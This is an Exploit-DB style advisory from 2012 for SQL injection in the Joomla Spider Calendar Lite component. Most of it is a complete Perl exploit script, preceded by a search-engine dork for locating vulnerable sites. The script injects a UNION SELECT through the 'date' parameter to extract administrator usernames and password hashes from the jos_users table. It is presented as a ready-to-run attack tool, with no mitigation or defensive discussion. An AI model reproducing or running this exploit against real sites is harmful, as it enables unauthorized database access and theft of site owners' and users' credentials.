Joomla! Component Spider Calendar - SQL Injection

EDB-ID:

20983

CVE:



Author:

D4NB4R

Type:

webapps


Platform:

PHP

Date:

2012-09-01


 Exploit Title: Joomla spider calendar lite Remote Exploit

 dork: inurl:com_spidercalendar
 
 Date: [29-08-2012]
 
 Author: Daniel Barragan "D4NB4R"
 
 Twitter: @D4NB4R
 
 site: http://poisonsecurity.wordpress.com/
 
 Vendor: http://web-dorado.com/products/spider-calendar-lite.html
 
 Version: Last 
 
 License: Non-Commercial

 Download: http://web-dorado.com/products/spider-calendar-lite.html
  
 Tested on: [Linux(bt5)-Windows(7ultimate)]

 Especial greetz:  _84kur10_, dedalo, nav


Descripcion: 

Spider Calendar Lite is a highly configurable Joomla extension which allows you to have multiple organized events in a calendar. You can create as many events as you need for a day. With a simple click on the date you will see the events and their descriptions recorded for that day. 

Exploit: 


    #!/usr/bin/perl -w
    # Joomla Component (spidercalendar) Remote SQL Exploit
    #----------------------------------------------------------------------------#

    ########################################
    print "\t\t\n\n";
print "\t\n";
print "\t            Daniel Barragan  D4NB4R                \n";
print "\t                                                   \n";
print "\t      Joomla com_spidercalendar Remote Sql Exploit \n";
print "\t\n\n";

use LWP::UserAgent;
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";

chomp(my $target=<STDIN>);

    #the username of  joomla
    $user="username";
    #the pasword of  joomla
    $pass="password";
    #the tables of joomla
    $table="jos_users";
    $d4n="null";
    ########################################
    #----------------------------------------------------------------------------#
    ########################################
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    ########################################
    #----------------------------------------------------------------------------#
    ########################################
    $host = $target . "index.php?option=com_spidercalendar&date=999999.9' union all select ".$d4n."%2Cnull%2Cconcat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,".$pass.",0x3c706173733e)%2Cnull%2Cnull%2Cnull from ".$table."+--+ D4NB4R";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    ########################################
    #----------------------------------------------------------------------------#
    ########################################
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    ########################################
    #----------------------------------------------------------------------------#
    ########################################
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed...\n";}
    ########################################
    #-------------------Exploit exploited by D4NB4R --------------------#
    ########################################

        


  
_____________________________________________________
Daniel Barragan "D4NB4R" 2012